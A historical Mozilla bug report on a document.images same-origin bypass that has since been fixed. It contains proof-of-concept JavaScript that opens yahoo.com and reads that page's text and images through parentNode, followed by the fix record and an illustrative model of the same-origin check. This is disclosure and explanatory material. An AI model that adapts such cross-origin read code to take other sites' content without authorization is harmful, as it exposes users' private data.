Closed Bug 17537 Opened 25 years ago Closed 25 years ago

document.images vulnerabilities

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

Details

document.images is not protected by "Same origin" security policy, which leads to the following vulnerabilities:

1) Exposing the DOM of arbitrary documents (by using "parentNode") - at least reading arbitrary documents
2) Browsing the images of arbitrary documents.

The code is:
----------------------------------------------------------
function f(o) {
  var s='';
  var i;
  s = o.nodeValue;
  if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
      s += f(o.childNodes[i]);
  return s;
}

function f2() {
  alert("The text is:\n"+f(a.document.images[0].parentNode.parentNode.parentNode.parentNode.parentNode));
  alert("The first image is: '"+a.document.images[0].src+"'");
}

a=window.open("http://www.yahoo.com");
setTimeout("f2()",10000);
----------------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M14
Made "parentNode" subject to a same-origin test.
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
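A model of the fix described above, as an added example that is not Mozilla's code or part of the original report: reads on another window's objects pass through one guard, which shows why checking only the entry points is not enough once `parentNode` lets a script step from an `images` element back into the tree. All names, URLs and the "before" set of checked properties are constructed for illustration.

```javascript
// Constructed model, not Mozilla code; all names and URLs are hypothetical.
function sameOrigin(a, b) {
  const x = new URL(a), y = new URL(b);
  return x.protocol === y.protocol && x.hostname === y.hostname && x.port === y.port;
}

// Tiny document tree: HTML > BODY > (#text, IMG).
function makeDoc(url, text, imgSrc) {
  const html = { nodeName: 'HTML', parentNode: null, childNodes: [] };
  const body = { nodeName: 'BODY', parentNode: html, childNodes: [] };
  const txt = { nodeName: '#text', nodeValue: text, parentNode: body, childNodes: [] };
  const img = { nodeName: 'IMG', src: imgSrc, parentNode: body, childNodes: [] };
  body.childNodes.push(txt, img);
  html.childNodes.push(body);
  return { url, images: [img], documentElement: html };
}

// Wrap an object owned by ownerUrl for a script running at callerUrl.
// Reads of any property named in `checked` get a same-origin test, and every
// object handed back is wrapped again so the test follows the traversal.
function guard(target, ownerUrl, callerUrl, checked) {
  return new Proxy(target, {
    get(obj, prop) {
      if (checked.has(prop) && !sameOrigin(ownerUrl, callerUrl)) {
        throw new Error('same-origin check failed for ' + String(prop));
      }
      const v = obj[prop];
      return v !== null && typeof v === 'object'
        ? guard(v, ownerUrl, callerUrl, checked) : v;
    }
  });
}

// Assumed "before" state: only the document's root entry point is checked.
const BEFORE = new Set(['documentElement']);
// After the fix described in the bug: parentNode is checked as well.
const AFTER = new Set(['documentElement', 'parentNode']);

// Read the text next to images[0] by stepping up through parentNode.
function readViaImages(doc, callerUrl, checked) {
  const d = guard(doc, doc.url, callerUrl, checked);
  try {
    return d.images[0].parentNode.childNodes[0].nodeValue;
  } catch (e) {
    return 'DENIED';
  }
}
```

The model leaves `images[i].src` unchecked because the fix comment in this bug names only `parentNode`.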
Verified fixed.
Status: RESOLVED → VERIFIED
QA Contact: dshea → junruh
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General